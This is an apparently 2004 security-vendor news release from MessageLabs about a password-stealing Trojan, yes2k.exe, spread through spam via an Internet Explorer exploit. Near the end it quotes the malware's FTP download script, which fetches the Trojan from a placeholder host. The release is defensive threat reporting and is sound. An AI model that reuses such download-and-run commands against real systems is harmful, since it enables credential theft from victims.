|
|
Rubrik: World-wide News/Products & News MessageLabs:
Security Threats - The Convergence of Virus and Spamming Techniques New
Trojan Demonstrates Increasing Complexity of Converged E-Mail Security
Threats (22.05.04) - MessageLabs, the leading provider of managed E-Mail security services to businesses, is urging global E-Mail users to be alert to the increasing sophistication of different E-Mail security threats that are resulting from the convergence of virus and spamming techniques. The warning comes further to MessageLabs' identification of a new password-stealing Trojan - filename yes2k.exe - which had attempted to spread via the use of spamming techniques.
Anzeige
MessageLabs
was alerted to the threat when it detected a spam outbreak that uses the
Microsoft Internet Explorer object data exploit1 to download an html script
from a particular IP address. This creates and runs an ftp script to download
and run yes2k.exe. Recently, spammers seeking to gain as wide an audience as
possible for their messages have taken to employing virus-writing techniques
to propagate their information. However, in this case, the approach has been
turned on its head and it is the malicious code that is being spread after
the spam has seeded the distribution network. Spam is more prevalent than
viruses: in April MessageLabs scanned 841.1 million E-Mails and found that
while 67 percent were spam, just 9 percent were infected with viruses. Paul Wood, MessageLabs' Chief Information Analyst, says: "All the evidence shows that the lines between the different types of E-Mail security threat are becoming increasingly blurred. Viruses, Trojans and spam in particular are being thrown into the melting pot to create an increasingly sophisticated variety of E-Mail security threat. This technique is known as convergence, and we should expect to see rising numbers of converged threats in the future. In order to protect themselves, businesses need to ensure that they have a solution capable of guarding against all E-Mail security threats - whether they are in their simplest form or deployed as part of a converged attack." Details of yes2k.exe: Open
(IP address) ftp any@any.net bin lcd C:/ get
yes2k.exe bye yes2k is a password stealer packed with a modified version of UPX. (ma) MessageLabs Office
UK: Tel.
(0044-1452) 627627, Fax (0044-1452) 627628 Sales: E-Mail: salesquery@messagelabs.com General: E-Mail: info@messagelabs.com Web: www.messagelabs.com MessageLabs: Deutschland Kontakt: Henning Ogberg Tel.
(089) 189-43990, Fax (089) 189-4399-9, E-Mail: hogberg@messagelabs.com Web: www.messagelabs.com |
